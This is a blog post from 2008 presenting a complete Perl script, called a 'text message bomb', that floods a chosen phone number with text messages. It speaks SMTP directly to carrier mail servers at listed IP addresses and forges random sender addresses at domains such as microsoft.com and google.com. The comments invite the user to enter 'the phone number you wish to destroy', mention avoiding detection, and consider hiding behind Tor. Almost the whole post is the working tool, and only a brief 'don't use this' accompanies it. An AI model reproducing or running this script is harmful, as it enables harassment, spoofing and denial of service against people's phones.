Friday, April 25, 2008

text message bomb

This was a proof of concept proving that you could deliver emails directly to an MTA to send spoofed text messages to cell phones. Most phones don't differentiate between SMS texts and emails, so.

#!/usr/bin/perl
###
# This is a text message bomb.  Simply enter the phone number you wish to destroy
# and the provider the phone number belongs to (www.fonefinder.net works) and
# enter the amount of text messages you wish to send.
#
# It makes a single connection to the MTA that delivers the message, which helps
# to avoid detection.
#
# You'll notice I didn't use any non-standard modules for the socket and
# the SMTP interaction.  I wanted to make it as portable as possible.
#
# TODO:
# Add the ability to hide behind TOR proxies
# - Did some research.  Tor blocks port 25.  Oh well.
# Create a "data" buffer which contains random data from /dev/urandom.
# - Used this in a beta version of the code.  Not very cool
# Add ability to specify a message
# + Added
# Add random messages to send
#
#
# This is a proof of concept created by nwo.
#
# It is probably very illegal to use this, so don't.  I am not liable for any
# carnage it creates.
# 12/18/2007 - nwo
###
use Socket;

### These are the email domains to which text messages can be sent.
### Example - 1234567890@vtext.com
# cingularme.com
# messaging.sprintpcs.com
# vtext.com
# messaging.nextel.com
# tmomail.net
# mmode.com
# vmobl.com
### The list of providers that are supported along with the email domain
### and an active MX record for the domain.
%providers = (
  'cingular' => 'cingularme.com,66.102.165.114',
  'sprint' => 'messaging.sprintpcs.com,68.28.3.22',
  'verizon' => 'vtext.com,66.174.76.30',
  'nextel' => 'messaging.nextel.com,170.206.225.64',
  't-mobile' => 'tmomail.net,66.94.9.228',
  'att' => 'mmode.com,199.88.234.33',
  'vmobile' => 'vmobl.com,205.239.227.29'
);

### Provide the script with the phone number and provider of the victim
if($ARGV[2] eq "") {
        print "Usage: ./txtbomb.pl   \n";
        print "Provider list:\n";
        $i=1;
        foreach $line (keys %providers) {
                print "$i) $line\n";
                $i++;
        }
        exit(1);
}

$phone = $ARGV[0];
$provider = $ARGV[1];
$num = $ARGV[2];

print "What message do you want to send?: ";
chomp($msg = );

if($msg =~ /random/i) {
  $msg = &random();
}
### Random users.
@user = ('amy', 'joe', 'bob', 'carol', 'kathy', 'sharon', 'lindsey', 'jordan',
        'billy', 'osama', 'duane', 'chris', 'sam', 'webmaster', 'linda', 'john',
        'michelle', 'jeff', 'paco', 'hugh', 'tacos', 'gurd', 'deb', 'nancy');
$nuser = @user;

### Random domains.
@domains = ('microsoft.com', 'google.com', 'yahoo.com', 'hotmail.com',   'craigslist.com',
            'bob.com', 'blogspot.com', 'money.com', 'infowars.com', 'youtube.com', 'godaddy.com');
$ndomains = @domains;

### Create a random "FROM" email address.
sub random() {
  $randomfrom = "$user[(int rand($nuser))]\@$domains[(int rand($ndomains))]";
  return($randomfrom);
}

### If the provider doesn't match one from the list, error and quit.
if($providers{$provider} eq "") {
  print "Invalid provider.  Try again.\n";
  exit(1);
}

($email,$mx) = split(/\,/,$providers{$provider});
print "Sending to $phone on $provider ($mx) - $phone\@$email...\n";
###  Create a socket and connect it.
($addr) = (gethostbyname $mx)[4];
$con = pack('S n a4 x8', 2, 25, $addr);
if (socket(S, 2, 1, 6)) { print "socket creation ok...\n"; } else { die $!; }
if (connect(S,$con)) { print "socket connected...\n"; } else { die $!; }
select(S); $| = 1; select(STDOUT);

### Be polite and say HELO to the nice mail server.
$a = S; if($a =~ /^220/) { print S "HELO $domains[(int rand($ndomains))]\n"; }
$i = 1;
### Send the message to the socket.
while($i <= $num) {
  $from = &random;
  $a = S; if($a =~ /^250/) { print S "MAIL FROM:<$from>\n"; }
  $a = S; if($a =~ /^250/) { print S "RCPT TO:<$phone\@$email>\n"; }
  $a = S; if($a =~ /^550/) {
    ### Apparently the user isn't valid on this MTA.
    print "Received invalid user.  Check the number and provider and try again.\n";
    close(S);
    exit(1);
  } else {
    ### Open the flood gates.
    if($i eq "1") {
      print "Received Valid user. It's peanut buttah jellay time!\n";
    }
    print S "DATA\n";
    print S "FROM:<$from>\n";
    print "$i) Sending from: $from\n";
    print S "TO:<$phone\@$email>\n";
    print S "$msg\n";
    print S ".\n";
    sleep 2;
    $i++;
  }
}
close(S);
exit(0);
Posted by at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)